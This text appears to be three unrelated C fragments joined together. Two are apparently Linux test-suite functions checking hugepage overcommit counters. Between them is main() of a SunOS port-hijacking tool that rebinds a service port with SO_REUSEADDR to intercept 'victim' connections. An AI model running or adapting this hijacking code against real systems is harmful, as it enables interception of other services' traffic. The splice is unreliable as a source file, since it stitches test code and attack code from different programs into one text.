static void test_overcommit(void) { void *addr = NULL, *shmaddr = NULL; if (opt_shmid) { shmid = SAFE_SHMGET(key, (length / 2 * hugepagesize), SHM_HUGETLB | IPC_CREAT | SHM_R | SHM_W); } else { fd = SAFE_OPEN(TEST_FILE, O_CREAT | O_RDWR, 0755); addr = SAFE_MMAP(ADDR, (length / 2 * hugepagesize), PROTECTION, FLAGS, fd, 0); } if (opt_sysfs) { tst_res(TINFO, "check sysfs before allocation."); if (checksys(path_sys_sz_huge, "HugePages_Total", length / 2)) return; if (checksys(path_sys_sz_free, "HugePages_Free", length / 2)) return; if (checksys(path_sys_sz_surp, "HugePages_Surp", length / 2 - size)) return; if (checksys(path_sys_sz_resv, "HugePages_Rsvd", length / 2)) return; } else { tst_res(TINFO, "check /proc/meminfo before allocation."); if (checkproc(SAFE_READ_MEMINFO("HugePages_Total:"), "HugePages_Total", length / 2)) return; if (checkproc(SAFE_READ_MEMINFO("HugePages_Free:"), "HugePages_Free", length / 2)) return; if (checkproc(SAFE_READ_MEMINFO("HugePages_Surp:"), "HugePages_Surp", length / 2 - size)) return; if (checkproc(SAFE_READ_MEMINFO("HugePages_Rsvd:"), "HugePages_Rsvd", length / 2)) return; } if (opt_shmid) { tst_res(TINFO, "shmid: 0x%x", shmid); shmaddr = SAFE_SHMAT(shmid, ADDR, SHMAT_FLAGS); check_wr_bytes(shmaddr); } else { check_wr_bytes(addr); } if (opt_sysfs) { tst_res(TINFO, "check sysfs."); if (checksys(path_sys_sz_huge, "HugePages_Total", length / 2)) return; if (checksys(path_sys_sz_free, "HugePages_Free", 0)) return; if (checksys(path_sys_sz_surp, "HugePages_Surp", length / 2 - size)) return; if (checksys(path_sys_sz_resv, "HugePages_Rsvd", 0)) return; } else { tst_res(TINFO, "check /proc/meminfo."); if (checkproc(SAFE_READ_MEMINFO("HugePages_Total:"), "HugePages_Total", length / 2)) return; if (checkproc(SAFE_READ_MEMINFO("HugePages_Free:"), "HugePages_Free", 0)) return; if (checkproc(SAFE_READ_MEMINFO("HugePages_Surp:"), "HugePages_Surp", length / 2 - size)) return; if (checkproc(SAFE_READ_MEMINFO("HugePages_Rsvd:"), "HugePages_Rsvd", 0)) return; } if (opt_shmid) { SAFE_SHMDT(shmaddr); SAFE_SHMCTL(shmid, IPC_RMID, NULL); } else { SAFE_MUNMAP(addr, (length / 2 * hugepagesize)); SAFE_CLOSE(fd); SAFE_UNLINK(TEST_FILE); } tst_res(TPASS, "hugepages overcommit test pass"); }
int main(int argc, char **argv) { int inbuf, jacksock, opts, solvuln; int port = PORT; char *vulnerable = NULL; char *systype = NULL; char *isvuln = NULL; char *bad = NULL; struct sockaddr_in solaris, victims; if(argc < 2) { banner(); _exit(EXIT_FAILURE); } if((systype = checksys(isvuln)) == NULL) { puts("Something messed up!"); checkerr(isvuln); } if(strcmp(SYSTEM, systype) != 0) { puts("System is not supported - SunOS only!"); checkerr(isvuln); } fprintf(stderr, "\n%s-> %sOK, potential vulnerable %s[%s] %ssystem, continuing..\n", WH, NO, BL, systype, NO); free(isvuln); sleep(2); while((opts = getopt(argc, argv, "h:p:v")) != -1) { switch(opts) { case 'h': bad = BAD; vulnerable = malloc(16); if(!vulnerable) { perror("malloc"); _exit(EXIT_FAILURE); } if((optarg == NULL) || (strlen(optarg) < 7) || (strlen(optarg) > 15) || strpbrk(bad, optarg)) { puts("\n[-] Failed: IP address just isn't right!\n"); jackerr(vulnerable); } memcpy(vulnerable, optarg, strlen(optarg)); if(!vulnerable) { jackerr(vulnerable); } break; case 'p': port = atoi(optarg); if((port < 1024) || (port > 65535)) { puts("\n[-] Failed: Port number just isn't right!\n"); usage(argc, argv); _exit(EXIT_FAILURE); } break; case 'v': usage(argc, argv); break; default: usage(argc, argv); break; } } if(vulnerable == NULL) { jackerr(vulnerable); } fprintf(stderr, "%s-> %sJacking port %s[%d] %sat address %s[%s]%s\n", WH, NO, PI, port, NO, PU, vulnerable, NO); jacksock = socket(AF_INET, SOCK_STREAM, 0); if(jacksock < 0) { perror("socket"); jackerr(vulnerable); } sleep(2); if(setsockopt(jacksock, SOL_SOCKET, SO_REUSEADDR, &solvuln, sizeof(int)) < 0) { perror("setsockopt"); } solaris.sin_family = AF_INET; solaris.sin_port = htons(port); solaris.sin_addr.s_addr = inet_addr(vulnerable); memset(&solaris.sin_zero, '\0', sizeof(solaris.sin_zero)); if(bind(jacksock, (struct sockaddr *)&solaris, sizeof(struct sockaddr)) < 0) { perror("bind"); fprintf(stderr, "[-] %sFailed: %sCould not snag port, must be patched!\n", RE, NO); jackerr(vulnerable); } fprintf(stderr, "%s-> %s%sSuccess!! %sPort %s[%d] %shas been hijacked!\n%s-> %sWait...\n", WH, NO, YE, NO, PI, port, NO, WH, NO); if(listen(jacksock, MAX_INCONN) < 0) { perror("listen"); puts("[-] Failed: Could not listen for an incoming connection!"); jackerr(vulnerable); } sleep(2); fprintf(stderr, "%s-> %sOK, listening for incoming connections to compromise", WH, NO); inbuf = sizeof(victims); if(accept(jacksock, (struct sockaddr *)&victims, &inbuf) < 0) { perror("accept"); puts("[-] Failed: Could not accept the incoming connection!"); jackerr(vulnerable); } fprintf(stderr, "\n%s-> %sSnagged a victim connecting from %s[%s]%s\n", WH, NO, YE, inet_ntoa(victims.sin_addr), NO); sleep(1); close(jacksock); puts("-> Victim has been released to live another day!"); sleep(1); puts("-> Test was a success!"); free(vulnerable); return(0); }
static void overcommit(void) { void *addr = NULL, *shmaddr = NULL; int fd = -1, key = -1; char s[BUFSIZ]; FILE *fp; if (shmid != -1) { /* Use /proc/meminfo to generate an IPC key. */ key = ftok(PATH_MEMINFO, strlen(PATH_MEMINFO)); if (key == -1) tst_brkm(TBROK|TERRNO, cleanup, "ftok"); shmid = shmget(key, (long)(length / 2 * hugepagesize), SHM_HUGETLB | IPC_CREAT | SHM_R | SHM_W); if (shmid == -1) tst_brkm(TBROK|TERRNO, cleanup, "shmget"); } else { /* XXX (garrcoop): memory leak. */ snprintf(s, BUFSIZ, "%s/hugemmap05/file", get_tst_tmpdir()); fd = open(s, O_CREAT | O_RDWR, 0755); if (fd == -1) tst_brkm(TBROK|TERRNO, cleanup, "open"); addr = mmap(ADDR, (long)(length / 2 * hugepagesize), PROTECTION, FLAGS, fd, 0); if (addr == MAP_FAILED) tst_brkm(TBROK|TERRNO, cleanup, "mmap"); } if (opt_sysfs) { tst_resm(TINFO, "check sysfs before allocation."); if (checksys(path_sys_sz_huge, "HugePages_Total", length / 2) != 0) return; if (checksys(path_sys_sz_free, "HugePages_Free", length / 2) != 0) return; if (checksys(path_sys_sz_surp, "HugePages_Surp", length / 2 - size) != 0) return; if (checksys(path_sys_sz_resv, "HugePages_Rsvd", length / 2) != 0) return; } else { tst_resm(TINFO, "check /proc/meminfo before allocation."); fp = fopen(PATH_MEMINFO, "r"); if (fp == NULL) tst_brkm(TBROK|TERRNO, cleanup, "fopen"); if (checkproc(fp, "HugePages_Total", length / 2) != 0) return; if (checkproc(fp, "HugePages_Free", length / 2 ) != 0) return; if (checkproc(fp, "HugePages_Surp", length / 2 - size) != 0) return; if (checkproc(fp, "HugePages_Rsvd", length / 2) != 0) return; fclose(fp); } if (shmid != -1) { tst_resm(TINFO, "shmid: 0x%x", shmid); shmaddr = shmat(shmid, ADDR, SHMAT_FLAGS); if (shmaddr == (void *)-1) tst_brkm(TBROK|TERRNO, cleanup, "shmat"); write_bytes(shmaddr); read_bytes(shmaddr); } else { write_bytes(addr); read_bytes(addr); } if (opt_sysfs) { tst_resm(TINFO, "check sysfs."); if (checksys(path_sys_sz_huge, "HugePages_Total", length / 2) != 0) return; if (checksys(path_sys_sz_free, "HugePages_Free", 0) != 0) return; if (checksys(path_sys_sz_surp, "HugePages_Surp", length / 2 - size) != 0) return; if (checksys(path_sys_sz_resv, "HugePages_Rsvd", 0) != 0) return; } else { tst_resm(TINFO, "check /proc/meminfo."); fp = fopen(PATH_MEMINFO, "r"); if (fp == NULL) tst_brkm(TBROK|TERRNO, cleanup, "fopen"); if (checkproc(fp, "HugePages_Total", length / 2) != 0) return; if (checkproc(fp, "HugePages_Free", 0) != 0) return; if (checkproc(fp, "HugePages_Surp", length / 2 - size) != 0) return; if (checkproc(fp, "HugePages_Rsvd", 0) != 0) return; fclose(fp); } if (shmid != -1) { if (shmdt(shmaddr) != 0) tst_brkm(TBROK|TERRNO, cleanup, "shmdt"); } else { munmap(addr, (long)(length / 2 * hugepagesize)); close(fd); unlink(s); } }